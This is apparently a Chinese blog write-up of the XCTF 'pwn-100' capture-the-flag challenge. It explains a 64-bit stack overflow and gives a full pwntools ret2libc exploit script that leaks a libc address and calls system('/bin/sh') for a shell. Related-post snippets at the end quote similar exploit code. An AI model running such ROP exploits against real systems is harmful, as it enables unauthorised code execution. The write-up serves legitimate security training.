XCTF pwn-100

已于 2024-05-21 23:45:38 修改
阅读量520 收藏 9
点赞数 9
分类专栏: pwn 文章标签: linux python
于 2024-05-21 22:36:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zwb2603096342/article/details/139103640
版权

d0373c18b0b64190b9dbca9f80c3ad39.bmp

下载文件,checksec看保护,发现可以使用栈溢出

69544ecc347b44efa6ef79dcf706ccc2.bmp

用ida打开,结构非常简单,跟进sub_40064D

0e728d51ed6f48bfac6873ab339094f4.bmp

分析可以得到就是一个简单的输入,输入200个字节内容,然后退出

4cb708cb36c5455fb1abc3f87f26759f.bmp

那么便可以发现 v1是存在栈溢出的,但是发现此题目是没有system和/bin/sh的,那么便就是典型的64位的ret2libc,下面开始构建payload。

注意64位的传参方式,前六的参数传递到rdi,rsi,rdx,rcx,r8,r9各个寄存器上面,第七个参数开始传入的栈中,构造system("/bin/sh\x00"),先将/bin/sh地址pop到rdi中,再调用system,先ROPgadget获得pop_rdi_ret和ret(64位堆栈平衡)。

c70445ee4fbd471a9ac3ac8abc0b77f8.bmp

#也可以用下面语句获得指定寄存器
ROPgadget --binary pwn100 --only "pop|ret" | grep rdi

ok,准备完毕,直接上脚本

 

from pwn import *
from LibcSearcher3 import *
context(arch='amd64',log_level='debug')
#p=remote("61.147.171.105",54704)
p=process("./pwn100")

elf = ELF("./pwn100")
ret = 0x00000000004004e1
pop_rdi_ret = 0x0000000000400763
main = 0x040068E
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']

#第一部分泄露libc的基地址
padding = cyclic(0x40+8)
payload = padding
payload += flat(pop_rdi_ret,puts_got,puts_plt,main)
payload = payload.ljust(200,b'a')
p.send(payload)
p.recvuntil("bye~\n")

puts_addr = u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
print(f'[+][+][+]puts_address = {hex(puts_addr)}')

libc = LibcSearcher('puts',puts_addr)
base = puts_addr - libc.dump('puts')

#第二部分获得system和/bin/sh\x00地址
system = base + libc.dump('system')
bin_sh = base + libc.dump('str_bin_sh')

#第三部分开始攻击
payload1 = padding
payload1 += flat(pop_rdi_ret,bin_sh,ret,system)
#ret是64位堆栈平衡,但这里好像不加也没关系
payload1 = payload1.ljust(200,b'a')
p.send(payload1)
p.interactive()

发送后,选的是第四个

35932d0a63be466b88145acd7c5393bb.bmp

说明一下,打远程选用的是LibcSearcher3,因为用的是python3环境,打本地用的是LibcSearcher,虽然用的也是python3。

 

注释一下:

对于LibcSearcher,由于没人维护了,且适用于python2,好多情况LibcSearcher搜不到合适的libc版本,那么你可以通过泄露的地址的后三位,去如下这个网站直接找

libc database search (blukat.me)

而LibcSearcher3适用于python3,详情点击下方链接看吧

LibcSearcher3 · PyPI

 

 

蒟蒻zwb
关注
  • 9
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XCTF pwn-100(使用DynELF)
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-14 325
from pwn import * #p = process("./pwn-100") p = remote("111.198.29.45",37259) elf = ELF("./pwn-100") read_got = elf.got['read'] puts_plt = elf.plt['puts'] start = 0x400550 pop_rdi = 0x400763 #ROPgad...
XCTF-HW-pipeline附件
11-09
附件
XCTF-pwn-pwn100 writeup
Morphy_Amo的博客
12-13 1500
XCTF-pwn-pwn100
XCTF-pwn-guess_num - Writeup
菜小狗.的博客
08-11 6663
学习就是一个积累的过程 在这个过程中就是为了让迷迷糊糊的东西变得明朗起来的一个过程^_ ^ 所以往往在这个过程中会付出很多的时间来一点点积累~ 按照惯例看一下题目基本情况和它的保护情况等 开启了canary,不能直接栈溢出咯~ 下一步按照惯例该丢到ida里分析了。 可以看到sub_C3E()函数是可以调用system的 再main函数的后半段发现只要将输入的值十次v4都等于v6即可进入 su...
XCTF|PWN-string-WP
l2645470582_的博客
08-07 221
1、下载文件并开启靶机 2、在Linux中查看文件信息 checksec 5 我们看到: 1.该文件是64位的文件 2.启用了nx 3、用命令运行程序 seccomp-tools dump ./5 我们会发现一个图案 继续往下翻 we are wizard, we will give you hand, you can not defeat dragon by yourself ... we will tell you two secret ... ...
XCTF pwn部分解题记录
windy_ll的博客
02-13 2977
一、前言     闲来无事,刷刷ctf题(PS:傻逼CSDN,标题不能包含新手二字) 二、题目: level0     1、下载好题目后,拖入到kali中去,用file和checksec查看一下,可以发现该程序是64位,只开了NX保护,如下图所示:     2、拖入到IDA中去,发现在main函数中打印出信息后就调用了vulnerable_function函数,跟进vulnerable_function函数,可以发现read函数处为栈溢出漏洞,并且可以得知该buf数组距离ebp为0x80个字节,如下图所
XCTF-PWN-level2-WP
l2645470582_的博客
08-02 198
1、下载文件并开启靶机 2、在Linux中查看该文件信息 checksec 4 3、该文件是32位文件,用32位IDA打开该文件 3.1、shift+f12查看关键字符串 我们看到"/bin/sh"的地址为:x0804A024 3.2、双击关键字符串,按Ctrl+x,再f5进入main函数的反汇编代码 3.3、我们看到关键函数vulnerable_function(),双击进入 3.4、我们看到buf溢出,双击buf查看字符串 buf:0x88...
[XCTF-pwn] 2-pwn-100
weixin_52640415的博客
03-03 83
这个题直接有溢出,溢出到return写上puts(got[puts])+main,得到libc再回来,再system(/bin/sh) from pwn import * local = 0 if local == 1: p = process('./pwn') else: p = remote('111.200.241.244', 53462) elf = ELF('./pwn') context(arch='amd64', log_level='debug') pop_rdi
XCTF-pwn-stack2 - Writeup
菜小狗.的博客
11-28 536
偶尔在学习的阶段慢慢发现的进步 抽空写点笔记记录一下子 这次做的题目还是栈溢出漏洞的题目但是并没用用到payload,简单用了下ROP 题目描述 除了一个名称 stack2 题目描述是:暂无 下载附件运行一下看看流程 保护开启了nx 和canary 流程大概是提供了4个选项的功能:加数、改数还有求平均数啥的。 然后丢到iad里看一下这部分的流程简单分析一下漏洞点。 在这里看还是蛮正常的,...
XCTF PWN高手进阶区之pwn-200
neuisf的博客
01-29 636
此题,setbuf未发现有什么作用! exp: from pwn import * sub_addr=0x8048484 def leak(addr): payload=‘a’*112+p32(write_plt)+p32(sub_addr)+p32(1)+p32(addr)+p32(4) p.sendline(payload) return p.recv()[:4] p=process("./p...
XCTF mfc逆向-200
12-22
查壳 vmp。。。 看了大佬博客后得知解法 这是一个MFC程序,但我不会。。。...但是我知道mfc的程序应该都是一个个控件组成 ...发现这两个东西,第一个是窗口类名,第二个我也不晓得是啥,但是它比前面和后面的少了一个消息...
xctf_huaweicloud-qualifier-2020
05-31
xctf_huaweicloud-qualifier-2020写上去译文原始码类别名称网址分数解决了PWN cp 游戏 快速执行 Fastga mysqli 迷你人 nday_container_escape qemu-zzz 网络隐藏云我的1 我的2 派尔 网壳 :cross_mark: 杂项以太网 谁...
XCTF-mobile app2
01-03
app2-安卓逆向1.提取文件2.分析文件3.分析XML文件4.经过验证得到flag5....下载地址:点此下载 1.提取文件 更改app安装包后缀为zip 把这3个文件解压出来 ...然后使用dex2jar将dex文件转换为jar文件,得到一个jar文件,这个...
Linux fallocate工具用于预分配或释放文件空间的块
不积跬步,无以至千里;不积小流,无以成江海。
06-09 309
命令,您需要在具有适当权限的环境中运行它,例如通过SSH登录到Linux服务器或在Linux终端中运行。请确保指定的路径存在且可写。文件中未使用的磁盘空间。请注意,这不会改变文件的大小,只是释放了未使用的磁盘空间。之前,建议了解文件系统和存储设备的特性,以避免潜在的性能问题。是一个Linux命令行工具,用于预分配或释放文件空间的块。文件的大小截断为5MB。大于5MB的部分将被删除。文件的10MB偏移量处开始预分配5MB的磁盘空间。文件的10MB偏移量处开始的5MB磁盘空间。文件预分配10MB的磁盘空间。
解决 Linux 和 Java 1.8 中上传中文名称图片报错问题
最新发布
appearappear的博客
06-12 260
Linux 系统和 Java 1.8 中,当尝试上传含有中文名称的图片时,可能会遇到以下错误提示:为了解决这个问题,可以采取以下方法:在 Docker 的 中添加如下参数:Dockerfile使用以下命令启动 Java 程序,添加 参数:通过以上配置,确保了在启动 Java 程序时,使用了 UTF-8 编码,这样可以正确处理含有中文名称的文件,避免了报错问题的发生。3.5
Linux基础命令
威桑的博客
06-11 946
常见基础Linux命令
Linux下的动态链接和静态链接 及 调用libevent库函数的可执行文件无法正常运行情况剖析】
一起学习进步!
06-09 324
静态链接是指在编译时,将程序所依赖的函数或数据直接复制到最终的可执行文件中。这意味着可执行文件包含了程序运行所需的所有代码和数据。动态链接是指在运行时,程序所依赖的函数或数据从外部的共享库(shared library)中加载。这意味着可执行文件只包含了必要的引用信息,而实际的代码和数据则存储在外部的共享库中。
NVIDIA Jetson Linux 35.3.1-开发指南-Jetson软件架构
FREEDOM_X的专栏
06-11 756
下图显示了NVIDIA®Jetson™Linux架构。以下部分描述了每个模块的组件。在本开发人员指南或其他地方,许多组件的名称是指向组件主留档的链接。一些组件具有带有附加描述的单独链接。
xctf supersqli
09-01
对于 xctf supersqli,它是一个供参与者练习 SQL 注入技巧的 CTF(Capture The Flag)比赛题目。CTF比赛是一种网络安全竞赛,旨在测试参与者在各种安全领域的技能。在 xctf supersqli 中,参与者需要利用 SQL 注入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值